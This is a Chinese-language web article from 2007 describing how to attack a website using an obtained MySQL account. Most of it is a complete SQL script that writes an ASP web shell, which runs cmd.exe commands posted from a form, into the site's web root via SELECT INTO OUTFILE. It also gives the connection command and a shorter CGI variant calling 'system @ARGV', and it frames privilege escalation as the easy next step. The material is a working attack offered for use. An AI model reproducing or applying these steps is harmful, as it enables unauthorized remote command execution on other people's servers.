咨询电话:010-82823766

利用mysql空密码进行攻击
  • 2007-12-28 23:52:44
  • 发表时间:
  • 浏览次数:
  • 不详
  • 文章来源:
  • 佚名
  • 作者:

一天,突然得到一网站的mysql的账号,并查到它的主页所在位置为c:\www\www,首先在网上下载一个cmd.asp程序,然后写一个cmd.sql程序以便进行连接,把cmd.asp上传至它的目录,cmd.sql内容如下:

 

use test;

            create table tmp(cmd TEXT);

            insert into tmp values("<%@ Language=VBScript %>");

            insert into tmp values("<%");

            insert into tmp values("Dim oScript");

            insert into tmp values("Dim oScriptNet");

            insert into tmp values("Dim oFileSys, oFile");

            insert into tmp values("Dim szCMD, szTempFile");

            insert into tmp values("On Error Resume Next");

            insert into tmp values("' -- create the COM objects that we will be using -- '");

            insert into tmp values('Set oScript = Server.CreateObject("WSCRIPT.SHELL")');

            insert into tmp values('Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")');

            insert into tmp values('Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")');

            insert into tmp values("' -- check for a command that we have posted -- '");

            insert into tmp values('szCMD = Request.Form(".CMD")');

            insert into tmp values('If (szCMD <> "") Then');

            insert into tmp values("' -- Use a poor mans pipe ... a temp file -- '");

            insert into tmp values('szTempFile = "C:\" & oFileSys.GetTempName( )');

            insert into tmp values('Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)');

            insert into tmp values('Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)');

            insert into tmp values("End If");

            insert into tmp values("%>");

            insert into tmp values("<HTML>");

            insert into tmp values("<BODY>");

            insert into tmp values('<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">');

            insert into tmp values('<input type=text name=".CMD" size=45 value="<%= szCMD %>">');

            insert into tmp values('<input type=submit value="Run">');

            insert into tmp values("</FORM>");

            insert into tmp values("<PRE>");

            insert into tmp values('<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>');

            insert into tmp values("<br>");

            insert into tmp values("<%");

            insert into tmp values("If (IsObject(oFile)) Then");

            insert into tmp values("' -- Read the output from our command and remove the temp file -- '");

            insert into tmp values("On Error Resume Next");

            insert into tmp values("Response.Write Server.HTMLEncode(oFile.ReadAll)");

            insert into tmp values("oFile.Close");

            insert into tmp values("Call oFileSys.DeleteFile(szTempFile, True)");

            insert into tmp values("End If");

            insert into tmp values("%>");

            insert into tmp values("</BODY>");

            insert into tmp values("</HTML>");

            select * from tmp into outfile "c:\\www\\www\\234.asp";

            drop table tmp;

在用insert into往表里添加内容时,不能只用一个insert into将内容全部添加进去,要一行一行的加,不然就会出现错误,所以每一行都得有一个insert into.

然后进行连接:

 

c:\mysql\bin\mysql -u user -p password -h ip <cmd.sql

如果变为:

 

c:\mysql\bin\

则表明建立asp文件成功!然后:

 

http:\\www.xxx.com/234.asp

便可以得到一个普通用户的shell了!第一步成功了,成为超级用户也不会是难事吧!

如果通过mysql上传CGI文件的话就不用那么长篇了,

 

cmd.sql:

            use test;

            create table tmp(cmd TEXT);

            insert into tmp values('system @ARGV');

            select * from tmp into outfile "c:\\www\\www\\234.cgi";

            drop table tmp;

然后就可以通过http:\\www.xxx.com/234.cgi?dir c:\了,同样也得到了一个普通用户的shell了

top
推荐导读
推荐导读
bottom
top
热门文章
热门文章
bottom